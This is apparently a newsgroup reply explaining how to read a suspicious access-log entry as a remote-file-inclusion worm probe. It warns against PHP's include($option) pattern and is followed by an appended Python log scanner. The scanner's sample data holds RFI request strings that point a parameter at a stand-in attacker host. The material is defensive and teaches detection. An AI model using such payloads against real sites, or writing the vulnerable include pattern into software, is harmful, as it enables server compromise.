Re: how access log tell intrusions?
bingster <bdu@iastate.edu> writes:
> Thanks very much for the heads-up. I did not quite get what you
> said. Is there any tutorial like information on what the effect is of
> embedding URL within other URL?
This depends entirely on the script. By default, absolutely no effect
*but* some scripts may be set up to do one or more of:
a) Download the URL
b) Display a link to the URL
c) Send an HTTP redirect to the URL
d) Run arbitrary commands, as directed by the content of the URL
e) Format your hard disk
f) Play the 1812 overture from the server's internal speaker
g) Something else entirely
This particular thing looks a bit like a worm that's been going around
that replaces random parameters in URLs with a URL, in the hope that
'd' will occur. With the number of badly written scripts on the web,
it's bound to work eventually.
> Juha Laiho wrote:
> > bingster <bdu@iastate.edu> said:
> >> How can I tell if my site has been hacked from looking at the
> >> access_log or other log files? I found the following log entry
> >> suspicious because of its 'option' part but cannot tell more than
> >> that, like what it really did to my site, etc.
It's suspicious but maybe not dangerous.
Look at the PHP script in question. If it does:
    include($option); or
    require($option); or
something else similar, then you are in trouble.
If you have PHP safe mode turned *on* you may be in much less trouble,
as this blocks most arbitrary command execution.
If the script doesn't have something like that - it just does something like
    if ($option == 'one') {
        function_one(1,2,3);
    } else {
        function_two(4,5,6);
    }
then it's safe.
If you don't understand PHP, you will need to learn PHP before
determining if the script is safe to put a URL in the 'option'
value. There are several PHP tutorials on the web, some good, some
which will inadvertently encourage you into writing scripts that do
'd'...
--
Chris
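
An added example, not part of the original post: one way to pull the requests discussed above out of an access log, by listing every query parameter whose value is itself a URL. The log lines, client addresses, and the `attacker.example` host are constructed for illustration; only the `option` parameter name comes from the thread.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request and status fields of a common/combined-format access log line.
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[0-9.]+" (?P<status>\d{3})')
# A parameter value that is itself a URL.
URL_VALUE_RE = re.compile(r"^\s*(?:https?|ftp)://", re.IGNORECASE)

# Constructed sample lines (not taken from the thread).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2005:13:55:36 -0500] '
    '"GET /index.php?option=http://attacker.example/cmd.txt?&id=3 HTTP/1.0" 200 5120',
    '203.0.113.9 - - [10/Oct/2005:13:56:02 -0500] '
    '"GET /index.php?option=one HTTP/1.1" 200 2048',
    '203.0.113.5 - - [10/Oct/2005:13:57:11 -0500] '
    '"GET /view.php?page=http%253A%252F%252Fattacker.example%252Fx HTTP/1.1" 404 312',
]

def url_valued_params(line):
    """Return (path, param, value, status) for each parameter holding a URL."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    target = urlsplit(m.group("target"))
    hits = []
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch double-encoded values.
        decoded = unquote(value)
        if URL_VALUE_RE.match(value) or URL_VALUE_RE.match(decoded):
            hits.append((target.path, name, decoded, int(m.group("status"))))
    return hits

def scan(lines):
    """Collect URL-valued parameters across all log lines."""
    hits = []
    for line in lines:
        hits.extend(url_valued_params(line))
    return hits

if __name__ == "__main__":
    for path, name, value, status in scan(SAMPLE_LOG):
        print(f"{status} {path} {name}={value}")
```

Each hit names a script and parameter to review; the log only shows that the request arrived, so whether it had any effect still depends on what that script does with the parameter.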